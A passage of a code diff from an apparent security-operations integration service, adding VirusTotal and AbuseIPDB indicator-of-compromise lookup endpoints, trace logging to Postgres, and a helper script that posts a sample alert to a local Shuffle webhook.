+                    ioc_value=payload.ioc_value,
517
+                    confidence_threshold=50,
518
+                )
519
+                per_provider["abuseipdb"] = abuse_result
520
+            except Exception as exc:
521
+                errors["abuseipdb"] = str(exc)
522
+
523
+    if not per_provider:
524
+        repo.add_ioc_trace(
525
+            action="evaluate",
526
+            ioc_type=payload.ioc_type,
527
+            ioc_value=payload.ioc_value,
528
+            providers=requested,
529
+            request_payload=payload.model_dump(mode="json"),
530
+            response_payload={},
531
+            error=str(errors),
532
+        )
533
+        raise HTTPException(status_code=502, detail=f"Provider evaluation failed: {errors}")
534
+
535
+    # aggregate decision (max confidence/severity, matched if any provider matched)
536
+    order = {"low": 1, "medium": 2, "high": 3, "critical": 4}
537
+    matched = any(bool(r.get("matched")) for r in per_provider.values())
538
+    confidence = max(float(r.get("confidence", 0.0) or 0.0) for r in per_provider.values())
539
+    severity = max((str(r.get("severity", "low")) for r in per_provider.values()), key=lambda x: order.get(x, 1))
540
+    reason_parts = [f"{name}:{res.get('reason','')}" for name, res in per_provider.items()]
541
+    if errors:
542
+        reason_parts.append(f"errors={errors}")
543
+    ioc_result = {
544
+        "ioc_type": payload.ioc_type,
545
+        "ioc_value": payload.ioc_value,
546
+        "matched": matched,
547
+        "severity": severity,
548
+        "confidence": round(confidence, 4),
549
+        "reason": " | ".join(reason_parts),
550
+        "providers": per_provider,
551
+    }
552
+
553
+    repo.add_ioc_trace(
554
+        action="evaluate",
555
+        ioc_type=payload.ioc_type,
556
+        ioc_value=payload.ioc_value,
557
+        providers=providers,
558
+        request_payload=payload.model_dump(mode="json"),
559
+        response_payload=ioc_result,
560
+        matched=matched,
561
+        severity=severity,
562
+        confidence=float(ioc_result["confidence"]),
563
+    )
564
+
565
+    return ApiResponse(data={"ioc": ioc_result})
566
+
567
+
568
+@app.post("/ioc/upload-file", response_model=ApiResponse)
569
+async def ioc_upload_file(file: UploadFile = File(...)) -> ApiResponse:
570
+    content = await file.read()
571
+    if not content:
572
+        raise HTTPException(status_code=400, detail="Uploaded file is empty")
573
+    try:
574
+        vt_upload = await virustotal_adapter.upload_file(file.filename or "upload.bin", content)
575
+    except Exception as exc:
576
+        repo.add_ioc_trace(
577
+            action="upload_file",
578
+            ioc_type="hash",
579
+            ioc_value=file.filename or "<unknown>",
580
+            providers=["virustotal"],
581
+            request_payload={"filename": file.filename, "size": len(content)},
582
+            response_payload={},
583
+            error=str(exc),
584
+        )
585
+        raise HTTPException(status_code=502, detail=f"VirusTotal upload failed: {exc}") from exc
586
+
587
+    repo.add_ioc_trace(
588
+        action="upload_file",
589
+        ioc_type="hash",
590
+        ioc_value=file.filename or "<unknown>",
591
+        providers=["virustotal"],
592
+        request_payload={"filename": file.filename, "size": len(content)},
593
+        response_payload=vt_upload if isinstance(vt_upload, dict) else {"raw": str(vt_upload)},
594
+    )
595
+    return ApiResponse(data={"virustotal": vt_upload})
596
+
597
+
598
+@app.get("/ioc/analysis/{analysis_id}", response_model=ApiResponse)
599
+async def ioc_get_analysis(analysis_id: str) -> ApiResponse:
600
+    try:
601
+        vt_analysis = await virustotal_adapter.get_analysis(analysis_id)
602
+    except Exception as exc:
603
+        repo.add_ioc_trace(
604
+            action="analysis",
605
+            ioc_type="hash",
606
+            ioc_value=analysis_id,
607
+            providers=["virustotal"],
608
+            request_payload={"analysis_id": analysis_id},
609
+            response_payload={},
610
+            error=str(exc),
611
+        )
612
+        raise HTTPException(status_code=502, detail=f"VirusTotal analysis fetch failed: {exc}") from exc
613
+
614
+    repo.add_ioc_trace(
615
+        action="analysis",
616
+        ioc_type="hash",
617
+        ioc_value=analysis_id,
618
+        providers=["virustotal"],
619
+        request_payload={"analysis_id": analysis_id},
620
+        response_payload=vt_analysis if isinstance(vt_analysis, dict) else {"raw": str(vt_analysis)},
621
+    )
622
+    return ApiResponse(data={"virustotal": vt_analysis})
623
+
624
+
625
+@app.post("/ioc/evaluate-file", response_model=ApiResponse)
626
+async def ioc_evaluate_file(
627
+    file: UploadFile = File(...),
628
+    malicious_threshold: int = 1,
629
+    suspicious_threshold: int = 3,
630
+    poll_timeout_seconds: int = 30,
631
+    poll_interval_seconds: int = 2,
632
+) -> ApiResponse:
633
+    content = await file.read()
634
+    if not content:
635
+        raise HTTPException(status_code=400, detail="Uploaded file is empty")
636
+
637
+    try:
638
+        vt_upload = await virustotal_adapter.upload_file(file.filename or "upload.bin", content)
639
+    except Exception as exc:
640
+        repo.add_ioc_trace(
641
+            action="evaluate_file",
642
+            ioc_type="hash",
643
+            ioc_value=file.filename or "<unknown>",
644
+            providers=["virustotal"],
645
+            request_payload={"filename": file.filename, "size": len(content)},
646
+            response_payload={},
647
+            error=str(exc),
648
+        )
649
+        raise HTTPException(status_code=502, detail=f"VirusTotal upload failed: {exc}") from exc
650
+
651
+    analysis_id = (
652
+        (((vt_upload.get("data") or {}).get("id")) if isinstance(vt_upload, dict) else None)
653
+        or ""
654
+    )
655
+    if not analysis_id:
656
+        raise HTTPException(status_code=502, detail="VirusTotal upload response missing analysis ID")
657
+
658
+    timeout = max(1, poll_timeout_seconds)
659
+    interval = max(1, poll_interval_seconds)
660
+    elapsed = 0
661
+    analysis: dict[str, object] = {}
662
+    while elapsed <= timeout:
663
+        analysis = await virustotal_adapter.get_analysis(analysis_id)
664
+        status = (
665
+            (((analysis.get("data") or {}).get("attributes") or {}).get("status"))
666
+            if isinstance(analysis, dict)
667
+            else None
668
+        )
669
+        if status == "completed":
670
+            break
671
+        await asyncio.sleep(interval)
672
+        elapsed += interval
673
+
674
+    sha256 = (
675
+        (((analysis.get("meta") or {}).get("file_info") or {}).get("sha256"))
676
+        if isinstance(analysis, dict)
677
+        else None
678
+    )
679
+    if not sha256:
680
+        raise HTTPException(status_code=502, detail="VirusTotal analysis did not return file hash yet")
681
+
682
+    try:
683
+        vt_file = await virustotal_adapter.enrich_ioc("hash", str(sha256))
684
+    except Exception as exc:
685
+        repo.add_ioc_trace(
686
+            action="evaluate_file",
687
+            ioc_type="hash",
688
+            ioc_value=str(sha256),
689
+            providers=["virustotal"],
690
+            request_payload={"filename": file.filename, "analysis_id": analysis_id},
691
+            response_payload={"upload": vt_upload, "analysis": analysis},
692
+            error=str(exc),
693
+        )
694
+        raise HTTPException(status_code=502, detail=f"VirusTotal report fetch failed: {exc}") from exc
695
+
696
+    ioc_result, matched, severity, confidence = _build_vt_ioc_result(
697
+        vt=vt_file,
698
+        ioc_type="hash",
699
+        ioc_value=str(sha256),
700
+        malicious_threshold=malicious_threshold,
701
+        suspicious_threshold=suspicious_threshold,
702
+    )
703
+    ioc_result["analysis_id"] = analysis_id
704
+    ioc_result["filename"] = file.filename
705
+
706
+    repo.add_ioc_trace(
707
+        action="evaluate_file",
708
+        ioc_type="hash",
709
+        ioc_value=str(sha256),
710
+        providers=["virustotal"],
711
+        request_payload={"filename": file.filename, "analysis_id": analysis_id},
712
+        response_payload={
713
+            "upload": vt_upload,
714
+            "analysis": analysis,
715
+            "ioc": ioc_result,
716
+        },
717
+        matched=matched,
718
+        severity=severity,
719
+        confidence=confidence,
720
+    )
721
+    return ApiResponse(data={"ioc": ioc_result, "analysis": analysis, "upload": vt_upload})
722
+
723
+
724
+@app.get("/ioc/history", response_model=ApiResponse)
725
+async def ioc_history(limit: int = 50, offset: int = 0) -> ApiResponse:
726
+    return ApiResponse(data={"items": repo.list_ioc_trace(limit=limit, offset=offset)})
727
+
728
+
300 729
 @app.get("/sync/wazuh-version", response_model=ApiResponse)
301 730
 async def sync_wazuh_version() -> ApiResponse:
302 731
     try:

+ 22 - 0
soc-integrator/app/models.py

@@ -25,6 +25,28 @@ class ActionCreateIncidentRequest(BaseModel):
25 25
     payload: dict[str, Any] = Field(default_factory=dict)
26 26
 
27 27
 
28
+class IrisTicketCreateRequest(BaseModel):
29
+    title: str
30
+    description: str = "Created by soc-integrator"
31
+    case_customer: int | None = None
32
+    case_soc_id: str | None = None
33
+    payload: dict[str, Any] = Field(default_factory=dict)
34
+
35
+
36
+class IocEnrichRequest(BaseModel):
37
+    ioc_type: Literal["domain", "ip", "hash", "url"]
38
+    ioc_value: str
39
+    providers: list[str] = Field(default_factory=lambda: ["virustotal"])
40
+
41
+
42
+class IocEvaluateRequest(BaseModel):
43
+    ioc_type: Literal["domain", "ip", "hash", "url"]
44
+    ioc_value: str
45
+    providers: list[str] = Field(default_factory=lambda: ["virustotal"])
46
+    malicious_threshold: int = 1
47
+    suspicious_threshold: int = 3
48
+
49
+
28 50
 class TriggerShuffleRequest(BaseModel):
29 51
     workflow_id: str
30 52
     execution_argument: dict[str, Any] = Field(default_factory=dict)

+ 49 - 0
soc-integrator/app/repositories/mvp_repo.py

@@ -151,3 +151,52 @@ class MvpRepository:
151 151
                 """,
152 152
                 (incident_key, status_code, success, response_excerpt),
153 153
             )
154
+
155
+    def add_ioc_trace(
156
+        self,
157
+        action: str,
158
+        ioc_type: str,
159
+        ioc_value: str,
160
+        providers: list[str],
161
+        request_payload: dict[str, Any],
162
+        response_payload: dict[str, Any],
163
+        matched: bool | None = None,
164
+        severity: str | None = None,
165
+        confidence: float | None = None,
166
+        error: str | None = None,
167
+    ) -> None:
168
+        with get_conn() as conn, conn.cursor() as cur:
169
+            cur.execute(
170
+                """
171
+                INSERT INTO ioc_trace(
172
+                  action, ioc_type, ioc_value, providers,
173
+                  request_payload, response_payload, matched, severity, confidence, error
174
+                )
175
+                VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s)
176
+                """,
177
+                (
178
+                    action,
179
+                    ioc_type,
180
+                    ioc_value,
181
+                    Json(providers),
182
+                    Json(request_payload),
183
+                    Json(response_payload),
184
+                    matched,
185
+                    severity,
186
+                    confidence,
187
+                    error,
188
+                ),
189
+            )
190
+
191
+    def list_ioc_trace(self, limit: int = 50, offset: int = 0) -> list[dict[str, Any]]:
192
+        with get_conn() as conn, conn.cursor() as cur:
193
+            cur.execute(
194
+                """
195
+                SELECT id, action, ioc_type, ioc_value, providers, matched, severity, confidence, error, created_at
196
+                FROM ioc_trace
197
+                ORDER BY created_at DESC
198
+                LIMIT %s OFFSET %s
199
+                """,
200
+                (max(1, limit), max(0, offset)),
201
+            )
202
+            return [dict(row) for row in cur.fetchall()]

+ 19 - 0
soc-integrator/examples/README.md

@@ -25,3 +25,22 @@ This script demonstrates:
25 25
 
26 26
 1. Direct call to `IRIS /api/v2/cases`
27 27
 2. Call through `soc-integrator /action/create-iris-case`
28
+
29
+## Send sample event to Shuffle webhook
30
+
31
+Use this helper with the sample workflow:
32
+
33
+- `/Users/simplicoltd./projects/soc/shuffle-workflows/sample-webhook-soc-integrator-iris-workflow.json`
34
+
35
+Run:
36
+
37
+```bash
38
+SHUFFLE_WEBHOOK_URL='http://localhost:3001/api/v1/hooks/webhook_xxx' \
39
+bash soc-integrator/examples/send_to_shuffle_webhook.sh
40
+```
41
+
42
+Environment variables:
43
+
44
+- `SHUFFLE_WEBHOOK_URL` (required)
45
+- `INTEGRATOR_URL` (default: `http://localhost:8088`)
46
+- `INTERNAL_KEY` (optional)

+ 29 - 0
soc-integrator/examples/send_to_shuffle_webhook.sh

@@ -0,0 +1,29 @@
1
+#!/usr/bin/env bash
2
+set -euo pipefail
3
+
4
+SHUFFLE_WEBHOOK_URL="${SHUFFLE_WEBHOOK_URL:-}"
5
+INTEGRATOR_URL="${INTEGRATOR_URL:-http://localhost:8088}"
6
+INTERNAL_KEY="${INTERNAL_KEY:-}"
7
+
8
+if [[ -z "${SHUFFLE_WEBHOOK_URL}" ]]; then
9
+  echo "error: SHUFFLE_WEBHOOK_URL is required"
10
+  echo "example:"
11
+  echo "  SHUFFLE_WEBHOOK_URL='http://localhost:3001/api/v1/hooks/webhook_...' \\"
12
+  echo "  bash soc-integrator/examples/send_to_shuffle_webhook.sh"
13
+  exit 1
14
+fi
15
+
16
+curl -sS -X POST "${SHUFFLE_WEBHOOK_URL}" \
17
+  -H "Content-Type: application/json" \
18
+  -d "{
19
+    \"event_id\": \"soc-integrator-test-$(date +%s)\",
20
+    \"source\": \"soc-integrator\",
21
+    \"severity\": \"high\",
22
+    \"title\": \"Suspicious VPN login outside Thailand\",
23
+    \"description\": \"Detected by soc-integrator test script\",
24
+    \"integrator_url\": \"${INTEGRATOR_URL}\",
25
+    \"internal_key\": \"${INTERNAL_KEY}\"
26
+  }"
27
+
28
+echo
29
+echo "sent webhook payload to Shuffle"

+ 1 - 0
soc-integrator/requirements.txt

@@ -3,3 +3,4 @@ uvicorn==0.35.0
3 3
 httpx==0.28.1
4 4
 pydantic-settings==2.10.1
5 5
 psycopg[binary]==3.2.1
6
+python-multipart==0.0.20

+ 0 - 6
wazuh-docker/.env

@@ -1,6 +0,0 @@
1
-WAZUH_VERSION=4.14.3
2
-WAZUH_IMAGE_VERSION=4.14.3
3
-WAZUH_TAG_REVISION=1
4
-FILEBEAT_TEMPLATE_BRANCH=4.14.3
5
-WAZUH_FILEBEAT_MODULE=wazuh-filebeat-0.5.tar.gz
6
-WAZUH_UI_REVISION=1